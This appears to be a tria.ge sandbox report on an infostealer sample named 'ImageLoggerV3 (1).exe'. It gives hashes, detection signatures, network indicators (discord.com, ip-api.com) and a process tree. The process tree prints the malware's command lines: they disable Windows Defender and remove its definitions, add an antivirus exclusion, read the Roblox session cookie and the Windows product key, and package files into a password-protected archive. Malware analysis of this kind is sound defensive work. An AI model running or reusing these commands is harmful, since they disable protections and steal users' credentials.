Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
90s -
max time network
92s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
13/02/2024, 22:59
General
-
Target
ImageLoggerV3 (1).exe
-
Size
5.0MB
-
MD5
da79b808c5703ad8ab3baca5108f50d8
-
SHA1
60240c4c4adcaf6116975f4a367d037d0635fc57
-
SHA256
ebeef30a8de1581089b4ed96dd6785165de084f7a8345bebf9ced80fc91812d4
-
SHA512
910cd54194bf1e0d0dc1b6a83ce685eee024a70a2ea369cd824a527bb04fad48b23be66c6b7f3e67ce66d05ddde9e35cf9ace875e06c4471553685762b172397
-
SSDEEP
98304:1FywqhY8jY9hoyAvEn/uM4tjfM7ZUZzHuI4C9L8Lu/NNBMyp3UTs2vT2:Aa9hoy6EnmM+jfqZUZ6I4yYLcUyjUT2
Malware Config
Signatures
-
ACProtect 1.3x - 1.4x DLL software 16 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x0006000000023224-21.dat acprotect behavioral1/files/0x0007000000023208-27.dat acprotect behavioral1/files/0x0006000000023222-31.dat acprotect behavioral1/files/0x0006000000023223-35.dat acprotect behavioral1/files/0x0006000000023221-34.dat acprotect behavioral1/files/0x0007000000023205-41.dat acprotect behavioral1/files/0x0006000000023229-40.dat acprotect behavioral1/files/0x0006000000023228-39.dat acprotect behavioral1/files/0x0006000000023227-38.dat acprotect behavioral1/files/0x000600000002321e-48.dat acprotect behavioral1/files/0x000600000002321d-47.dat acprotect behavioral1/files/0x000600000002321c-46.dat acprotect behavioral1/files/0x000600000002321b-45.dat acprotect behavioral1/files/0x000600000002321a-44.dat acprotect behavioral1/files/0x0006000000023219-43.dat acprotect behavioral1/files/0x0006000000023218-42.dat acprotect -
Executes dropped EXE 1 IoCs
pid Process 2808 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe 4424 ImageLoggerV3 (1).exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0006000000023224-21.dat upx behavioral1/memory/4424-25-0x0000000074840000-0x0000000074C71000-memory.dmp upx behavioral1/files/0x0007000000023208-27.dat upx behavioral1/memory/4424-30-0x0000000074790000-0x00000000747AF000-memory.dmp upx behavioral1/memory/4424-32-0x0000000074780000-0x000000007478C000-memory.dmp upx behavioral1/files/0x0006000000023222-31.dat upx behavioral1/files/0x0006000000023223-35.dat upx behavioral1/files/0x0006000000023221-34.dat upx behavioral1/files/0x0007000000023205-41.dat upx behavioral1/files/0x0006000000023229-40.dat upx behavioral1/files/0x0006000000023228-39.dat upx behavioral1/files/0x0006000000023227-38.dat upx behavioral1/files/0x000600000002321e-48.dat upx behavioral1/files/0x000600000002321d-47.dat upx behavioral1/files/0x000600000002321c-46.dat upx behavioral1/files/0x000600000002321b-45.dat upx behavioral1/files/0x000600000002321a-44.dat upx behavioral1/files/0x0006000000023219-43.dat upx behavioral1/files/0x0006000000023218-42.dat upx behavioral1/memory/4424-54-0x0000000074750000-0x0000000074777000-memory.dmp upx behavioral1/memory/4424-56-0x0000000074730000-0x0000000074748000-memory.dmp upx behavioral1/memory/4424-59-0x0000000074710000-0x0000000074725000-memory.dmp upx behavioral1/memory/4424-60-0x00000000745D0000-0x0000000074705000-memory.dmp upx behavioral1/memory/4424-62-0x00000000745B0000-0x00000000745C6000-memory.dmp upx behavioral1/memory/4424-64-0x0000000074560000-0x000000007456C000-memory.dmp upx behavioral1/memory/4424-66-0x0000000074530000-0x0000000074558000-memory.dmp upx behavioral1/memory/4424-70-0x0000000074840000-0x0000000074C71000-memory.dmp upx behavioral1/memory/4424-71-0x0000000074790000-0x00000000747AF000-memory.dmp upx behavioral1/memory/4424-72-0x0000000074490000-0x0000000074524000-memory.dmp upx behavioral1/memory/4424-77-0x00000000741B0000-0x00000000741BC000-memory.dmp upx behavioral1/memory/4424-75-0x0000000074230000-0x000000007448A000-memory.dmp upx behavioral1/memory/4424-79-0x0000000074780000-0x000000007478C000-memory.dmp upx behavioral1/memory/4424-78-0x00000000741C0000-0x00000000741D0000-memory.dmp upx behavioral1/memory/4424-81-0x0000000074090000-0x00000000741A4000-memory.dmp upx behavioral1/memory/4424-82-0x0000000074710000-0x0000000074725000-memory.dmp upx behavioral1/memory/4424-117-0x00000000745D0000-0x0000000074705000-memory.dmp upx behavioral1/memory/4424-151-0x00000000745B0000-0x00000000745C6000-memory.dmp upx behavioral1/memory/1324-152-0x00000000051A0000-0x00000000051B0000-memory.dmp upx behavioral1/memory/4424-167-0x0000000074530000-0x0000000074558000-memory.dmp upx behavioral1/memory/4424-242-0x0000000074840000-0x0000000074C71000-memory.dmp upx behavioral1/memory/4424-243-0x0000000074790000-0x00000000747AF000-memory.dmp upx behavioral1/memory/4424-257-0x0000000074710000-0x0000000074725000-memory.dmp upx behavioral1/memory/4424-258-0x00000000745D0000-0x0000000074705000-memory.dmp upx behavioral1/memory/4424-266-0x0000000074090000-0x00000000741A4000-memory.dmp upx behavioral1/memory/4424-275-0x0000000074840000-0x0000000074C71000-memory.dmp upx behavioral1/memory/4424-277-0x0000000074780000-0x000000007478C000-memory.dmp upx behavioral1/memory/4424-278-0x0000000074750000-0x0000000074777000-memory.dmp upx behavioral1/memory/4424-276-0x0000000074790000-0x00000000747AF000-memory.dmp upx behavioral1/memory/4424-279-0x0000000074730000-0x0000000074748000-memory.dmp upx behavioral1/memory/4424-280-0x0000000074710000-0x0000000074725000-memory.dmp upx behavioral1/memory/4424-281-0x00000000745D0000-0x0000000074705000-memory.dmp upx behavioral1/memory/4424-284-0x0000000074530000-0x0000000074558000-memory.dmp upx behavioral1/memory/4424-283-0x0000000074560000-0x000000007456C000-memory.dmp upx behavioral1/memory/4424-282-0x00000000745B0000-0x00000000745C6000-memory.dmp upx behavioral1/memory/4424-285-0x0000000074490000-0x0000000074524000-memory.dmp upx behavioral1/memory/4424-286-0x0000000074230000-0x000000007448A000-memory.dmp upx behavioral1/memory/4424-287-0x00000000741C0000-0x00000000741D0000-memory.dmp upx behavioral1/memory/4424-288-0x00000000741B0000-0x00000000741BC000-memory.dmp upx behavioral1/memory/4424-289-0x0000000074090000-0x00000000741A4000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 23 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3960 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 856 tasklist.exe 2444 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3972 powershell.exe 1324 powershell.exe 1324 powershell.exe 3972 powershell.exe 2656 powershell.exe 2656 powershell.exe 4068 powershell.exe 4068 powershell.exe 2396 powershell.exe 2396 powershell.exe 4568 powershell.exe 4568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3972 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 2444 tasklist.exe Token: SeDebugPrivilege 856 tasklist.exe Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 4068 powershell.exe Token: SeIncreaseQuotaPrivilege 3204 WMIC.exe Token: SeSecurityPrivilege 3204 WMIC.exe Token: SeTakeOwnershipPrivilege 3204 WMIC.exe Token: SeLoadDriverPrivilege 3204 WMIC.exe Token: SeSystemProfilePrivilege 3204 WMIC.exe Token: SeSystemtimePrivilege 3204 WMIC.exe Token: SeProfSingleProcessPrivilege 3204 WMIC.exe Token: SeIncBasePriorityPrivilege 3204 WMIC.exe Token: SeCreatePagefilePrivilege 3204 WMIC.exe Token: SeBackupPrivilege 3204 WMIC.exe Token: SeRestorePrivilege 3204 WMIC.exe Token: SeShutdownPrivilege 3204 WMIC.exe Token: SeDebugPrivilege 3204 WMIC.exe Token: SeSystemEnvironmentPrivilege 3204 WMIC.exe Token: SeRemoteShutdownPrivilege 3204 WMIC.exe Token: SeUndockPrivilege 3204 WMIC.exe Token: SeManageVolumePrivilege 3204 WMIC.exe Token: 33 3204 WMIC.exe Token: 34 3204 WMIC.exe Token: 35 3204 WMIC.exe Token: 36 3204 WMIC.exe Token: SeIncreaseQuotaPrivilege 3204 WMIC.exe Token: SeSecurityPrivilege 3204 WMIC.exe Token: SeTakeOwnershipPrivilege 3204 WMIC.exe Token: SeLoadDriverPrivilege 3204 WMIC.exe Token: SeSystemProfilePrivilege 3204 WMIC.exe Token: SeSystemtimePrivilege 3204 WMIC.exe Token: SeProfSingleProcessPrivilege 3204 WMIC.exe Token: SeIncBasePriorityPrivilege 3204 WMIC.exe Token: SeCreatePagefilePrivilege 3204 WMIC.exe Token: SeBackupPrivilege 3204 WMIC.exe Token: SeRestorePrivilege 3204 WMIC.exe Token: SeShutdownPrivilege 3204 WMIC.exe Token: SeDebugPrivilege 3204 WMIC.exe Token: SeSystemEnvironmentPrivilege 3204 WMIC.exe Token: SeRemoteShutdownPrivilege 3204 WMIC.exe Token: SeUndockPrivilege 3204 WMIC.exe Token: SeManageVolumePrivilege 3204 WMIC.exe Token: 33 3204 WMIC.exe Token: 34 3204 WMIC.exe Token: 35 3204 WMIC.exe Token: 36 3204 WMIC.exe Token: SeIncreaseQuotaPrivilege 4216 WMIC.exe Token: SeSecurityPrivilege 4216 WMIC.exe Token: SeTakeOwnershipPrivilege 4216 WMIC.exe Token: SeLoadDriverPrivilege 4216 WMIC.exe Token: SeSystemProfilePrivilege 4216 WMIC.exe Token: SeSystemtimePrivilege 4216 WMIC.exe Token: SeProfSingleProcessPrivilege 4216 WMIC.exe Token: SeIncBasePriorityPrivilege 4216 WMIC.exe Token: SeCreatePagefilePrivilege 4216 WMIC.exe Token: SeBackupPrivilege 4216 WMIC.exe Token: SeRestorePrivilege 4216 WMIC.exe Token: SeShutdownPrivilege 4216 WMIC.exe Token: SeDebugPrivilege 4216 WMIC.exe Token: SeSystemEnvironmentPrivilege 4216 WMIC.exe Token: SeRemoteShutdownPrivilege 4216 WMIC.exe Token: SeUndockPrivilege 4216 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5056 wrote to memory of 4424 5056 ImageLoggerV3 (1).exe 85 PID 5056 wrote to memory of 4424 5056 ImageLoggerV3 (1).exe 85 PID 5056 wrote to memory of 4424 5056 ImageLoggerV3 (1).exe 85 PID 4424 wrote to memory of 3504 4424 ImageLoggerV3 (1).exe 89 PID 4424 wrote to memory of 3504 4424 ImageLoggerV3 (1).exe 89 PID 4424 wrote to memory of 3504 4424 ImageLoggerV3 (1).exe 89 PID 4424 wrote to memory of 2196 4424 ImageLoggerV3 (1).exe 88 PID 4424 wrote to memory of 2196 4424 ImageLoggerV3 (1).exe 88 PID 4424 wrote to memory of 2196 4424 ImageLoggerV3 (1).exe 88 PID 3504 wrote to memory of 3972 3504 cmd.exe 90 PID 3504 wrote to memory of 3972 3504 cmd.exe 90 PID 3504 wrote to memory of 3972 3504 cmd.exe 90 PID 2196 wrote to memory of 1324 2196 cmd.exe 91 PID 2196 wrote to memory of 1324 2196 cmd.exe 91 PID 2196 wrote to memory of 1324 2196 cmd.exe 91 PID 4424 wrote to memory of 4036 4424 ImageLoggerV3 (1).exe 92 PID 4424 wrote to memory of 4036 4424 ImageLoggerV3 (1).exe 92 PID 4424 wrote to memory of 4036 4424 ImageLoggerV3 (1).exe 92 PID 4424 wrote to memory of 468 4424 ImageLoggerV3 (1).exe 93 PID 4424 wrote to memory of 468 4424 ImageLoggerV3 (1).exe 93 PID 4424 wrote to memory of 468 4424 ImageLoggerV3 (1).exe 93 PID 4036 wrote to memory of 2444 4036 cmd.exe 96 PID 4036 wrote to memory of 2444 4036 cmd.exe 96 PID 4036 wrote to memory of 2444 4036 cmd.exe 96 PID 468 wrote to memory of 856 468 cmd.exe 97 PID 468 wrote to memory of 856 468 cmd.exe 97 PID 468 wrote to memory of 856 468 cmd.exe 97 PID 4424 wrote to memory of 4932 4424 ImageLoggerV3 (1).exe 99 PID 4424 wrote to memory of 4932 4424 ImageLoggerV3 (1).exe 99 PID 4424 wrote to memory of 4932 4424 ImageLoggerV3 (1).exe 99 PID 4932 wrote to memory of 2656 4932 cmd.exe 101 PID 4932 wrote to memory of 2656 4932 cmd.exe 101 PID 4932 wrote to memory of 2656 4932 cmd.exe 101 PID 4424 wrote to memory of 1632 4424 ImageLoggerV3 (1).exe 102 PID 4424 wrote to memory of 1632 4424 ImageLoggerV3 (1).exe 102 PID 4424 wrote to memory of 1632 4424 ImageLoggerV3 (1).exe 102 PID 1632 wrote to memory of 4068 1632 cmd.exe 104 PID 1632 wrote to memory of 4068 1632 cmd.exe 104 PID 1632 wrote to memory of 4068 1632 cmd.exe 104 PID 4424 wrote to memory of 3372 4424 ImageLoggerV3 (1).exe 105 PID 4424 wrote to memory of 3372 4424 ImageLoggerV3 (1).exe 105 PID 4424 wrote to memory of 3372 4424 ImageLoggerV3 (1).exe 105 PID 3372 wrote to memory of 2808 3372 cmd.exe 107 PID 3372 wrote to memory of 2808 3372 cmd.exe 107 PID 4424 wrote to memory of 1520 4424 ImageLoggerV3 (1).exe 110 PID 4424 wrote to memory of 1520 4424 ImageLoggerV3 (1).exe 110 PID 4424 wrote to memory of 1520 4424 ImageLoggerV3 (1).exe 110 PID 1520 wrote to memory of 3204 1520 cmd.exe 112 PID 1520 wrote to memory of 3204 1520 cmd.exe 112 PID 1520 wrote to memory of 3204 1520 cmd.exe 112 PID 4424 wrote to memory of 4456 4424 ImageLoggerV3 (1).exe 113 PID 4424 wrote to memory of 4456 4424 ImageLoggerV3 (1).exe 113 PID 4424 wrote to memory of 4456 4424 ImageLoggerV3 (1).exe 113 PID 4456 wrote to memory of 4216 4456 cmd.exe 115 PID 4456 wrote to memory of 4216 4456 cmd.exe 115 PID 4456 wrote to memory of 4216 4456 cmd.exe 115 PID 4424 wrote to memory of 4948 4424 ImageLoggerV3 (1).exe 116 PID 4424 wrote to memory of 4948 4424 ImageLoggerV3 (1).exe 116 PID 4424 wrote to memory of 4948 4424 ImageLoggerV3 (1).exe 116 PID 4948 wrote to memory of 2152 4948 cmd.exe 118 PID 4948 wrote to memory of 2152 4948 cmd.exe 118 PID 4948 wrote to memory of 2152 4948 cmd.exe 118 PID 4424 wrote to memory of 2404 4424 ImageLoggerV3 (1).exe 120 PID 4424 wrote to memory of 2404 4424 ImageLoggerV3 (1).exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exe a -r -hp"neelarya" "C:\Users\Admin\AppData\Local\Temp\j9G4Y.zip" *"3⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exe a -r -hp"neelarya" "C:\Users\Admin\AppData\Local\Temp\j9G4Y.zip" *4⤵
- Executes dropped EXE
PID:2808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3932
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:4676
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4568
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD567555cc09af1733be30dba903ccb1c2c
SHA12f80d9ff763a892ebda160248085c333513f3147
SHA256d36671e155ab09b98441df154e662425f18ee4394d67fd593c2a24bbc5db53f0
SHA512ca15562b01b6e0912bc0fa1452b77173e24e4df14f9b43f75bef7fbb485332e39f622d668a0aef3eee73bfe2e9a8ab44807975152bcd8d7de9af73021ce0c228
-
Filesize
18KB
MD5bf0946511e189d3deeca5633c0aa6c11
SHA1cc5d13d595c582ed8951bef689af2ed4c3e5d994
SHA25637f08f1b006018344ab31cb08096b275c7c55c5189dd6b37529457728358de6d
SHA512f0946bbd6334a50be7322fac4c0e8a2a4627f04d844fe276e8b5c767fdc00bc226736bcf8dbaebcaa60bbcfac5c9dcccf3199b704ed13d3c347254de14adae6b
-
Filesize
18KB
MD5a2c882cf0305aa4e8a97b5b5ab41e496
SHA16ac1fddbfcec56a7fcd9b6016a997781f9a62b0c
SHA256e501d55804d9c40a0540d62bbdd6e2bb3c32a061d3a9a915014f08d47c45e0a5
SHA5122cc029cccc5bec1ea860c655e05a2e64fe40861e481c338cd6e86c5f7df7603444cbef50eccc7ff277daedb6d68c88f34e84ff7922a5cce6dbaaed0820e3823e
-
Filesize
16KB
MD53f4a6d1279a1f3abbde5cbc7197f63b9
SHA16d393ce08e84d7460a3fa9e3ec9ca035d036d8ee
SHA256a736946b58cdf9bb6d6ee4c1959d6985f00a63d48263cac757c1743f2b3962ac
SHA512022195223c1bf455a96e62d6e8d8f75c2fe61aceabb531ed75f8cc5e7093f4334153dac225184996abc8866882a58e16f0e766f14c8cff51dc0154959a4ac843
-
Filesize
78KB
MD51e6e97d60d411a2dee8964d3d05adb15
SHA10a2fe6ec6b6675c44998c282dbb1cd8787612faf
SHA2568598940e498271b542f2c04998626aa680f2172d0ff4f8dbd4ffec1a196540f9
SHA5123f7d79079c57786051a2f7facfb1046188049e831f12b549609a8f152664678ee35ad54d1fff4447428b6f76bea1c7ca88fa96aab395a560c6ec598344fcc7fa
-
Filesize
43KB
MD5e24fd981c2a2ecb4484a915cac0dab83
SHA19749e9cec26ef1ee1eb864e84394e257387a1d9b
SHA2569e0350aa39fb6f9a97a07153948f7330f8533469647fa8a95a9ad4fc849d1d0f
SHA5125bab9ba4fc9f818e49eb57df63bf10b37dc57f6a1005ada5e7ae507a8b131223a68b607f04a5bcba563655ce24ef6ef77e5083cdc88f640a6e7c1e68349b5095
-
Filesize
51KB
MD505b83399b84400e72fe28197f061f31e
SHA1c4cc31153f0a45b70bff195b648d17f6163a70ff
SHA2567bec7a1ad04235c652052d0e4eef9c4b8154d459a270ca3583608699f8a845ac
SHA51206ff60772226fb4efde03e3cdb2b7d5cf4bfb3d51866c3457ac2d9d3a4d1f8e0283896fe4119fc80d29c067eb9e9be3c863e9fb013663eff2048861f1dbffab9
-
Filesize
77KB
MD5fc45534f5b330a922ae2b0a40dea2735
SHA1d1dd6755480e65fe9d496adf5e5d8758c35c55f9
SHA256683c2c10b8c310a23d9f4273ae34e7d4d7869dc33d229c57070dc69ef3a806a0
SHA512196e446b1879fb62d83d4f5ac4ea1fd736b0a582968ffb6c7052fea12f50b6e3eadb447a6ba4e16a05efef8370332f66316b49ea0a745a828b6519bc77857aa8
-
Filesize
28KB
MD50ff27188bc4c5c723875a04606f0598c
SHA12bcd02b3c3292941cabba7b8ae65099d2c71f2ec
SHA256a60fe3c81e224db96c9ca9ca0f3d8c2962ed4b0922f429f852dbfbb4bbc7cbed
SHA5125c5923783b17efeabfe6343f3d51b038ea57ffaa09a1c33e55386943f2b51eeac89437b3037c88430257e5a00b0470340a7c93e173c64d315c81eb7fcd12b580
-
Filesize
78KB
MD54bb8f1f3e1497e34485eda4846a308a4
SHA1b077674823782c12f8eaad25dd7c6f2808459055
SHA256e08ea3c7290acd57f2754922dc7d05d0efa14930a72ea080ddb91b4bbf2a054f
SHA512d3f8babf80c3f7677e25b489927c595e3bc45a269db7c3e79326b9b86767c5d086f7e27057358be9570823c0315c7895c2926cfa1bcb030f7996a587620d0faa
-
Filesize
23KB
MD5bc08cf5259478a3d48575f3e2e7c3ba7
SHA15b1f74771498bdc09ae45527c7f4b578a6463433
SHA25695f2f31b912c9a2e3d20daa92149e442e48751b2eab0afe7c54d9bc7b191553d
SHA51227a0b21d3d65299309be614b619cd9ebf48e08ae60d37cd7cfe06368134c0ea210779b25a3d1094f204c0f24d3cd8e6c774c57b3863715b606cf24d8f4ee44ea
-
Filesize
37KB
MD5bc7abf3f1d0f52cff7b492233a0249b4
SHA1a9d9bf74f9c53753f58f3163935a427b146351d0
SHA256ecdea5b7e10b3b5d63dc9e85c840980c3ad03164fe521b048bce1efb2e98d19e
SHA51257aa1204912b5687b3d4cef7d74c324fefe299fad8a2be0c1748fb1598ba29d730091745cf987fd1251677842666b48f726a71f67744c8e9ab65ae7bcd3894dc
-
Filesize
38KB
MD52152912c1e1ebbfe0ae844d45da52107
SHA13e6e8da4db20291ccb5c1d9b2f7f48195363fb7a
SHA25682d2b7a609f7911bff60aeac95a72b8d6d04f7c40ace5a62b7a8992c880b921e
SHA5128c8c45294023c00f339ef516e16357fa5ce4563e41657c37dccb9f6bc3a0dc59e9f905bb044c93bde77bfbbf887aa8396956048dd0697d7cdf9c72b7d67f949d
-
Filesize
56KB
MD5572ae07b07846e61c75f3744bb86d60b
SHA1c7ee09f5098f1bb9a12f6ae5f56e7b1c618c358e
SHA25636c1ef649bfcccf19e1ceb55ac63ba1c8d19bab38718be53de9a205410942a9a
SHA5124ca8858b8ffa7be3e5842bdc5af3270961e2f10769bbe22b190fc016f58db25fdf59c7773c33ca98eec58b71eff1f9990843ac53b979a6bc9887e1cfefb47d01
-
Filesize
859KB
MD5fbcb6d01ad2e2c8021b1c88542174278
SHA18fed793694c18e2cd34d8cc7f6f1198b8783ff58
SHA2566a0cd90db0548408dcda8f0f59aa0cc6a87a4dc1159dcf8b3d750ef0f4c5dfe1
SHA5124aba2913d24ea5d6c12c648b85d15ceb59d58c4de93bd4ef86bf7f85b2b25d27b36cd4c99109857418287ab419ee1fdc4849b092ff068604539a79554b696f62
-
Filesize
69KB
MD599c942987fe70db3983a774ed78f252f
SHA10898c42988b3c8498e65ec39dc9d8bf41cc0b78f
SHA256e0db9f5fe018eca1669c015975eebbefeb8302c0957151168b5bfa7668caff0c
SHA5123c6ea2ee7021c8e3408b4d4943b704951b0bb7cc3ccf696042f4e813d272693fe2963117672b3c89217427af32ee5aa8793cc40661f046bc35eaeb5e503257bd
-
Filesize
69KB
MD50597dda18aab7d5ec75fe0f60238cc12
SHA12acb10a7235341c1225b1174c97ae07da25ec4fe
SHA256fb2b7a83deae229afcbf10a931ad332b62799e502acc52e82ff8845d76f35c09
SHA512e1e0788284f8cc2926fdf5df2157dc926fb6fbad4367e9fce7c7d885bda6c1c288efb7bf68173df6e92d99422b9d40def7fd1a52a3e7c2d33fc9fa4113787638
-
Filesize
753KB
MD5f05c8bbd35947b9019ef5f1d427cb07e
SHA18703df14305dc624a59808884d71e73877d509b4
SHA2562267f63a35fd3ff9599867a87fcb8123ea0e872a275f236a053ce8b1d13642d6
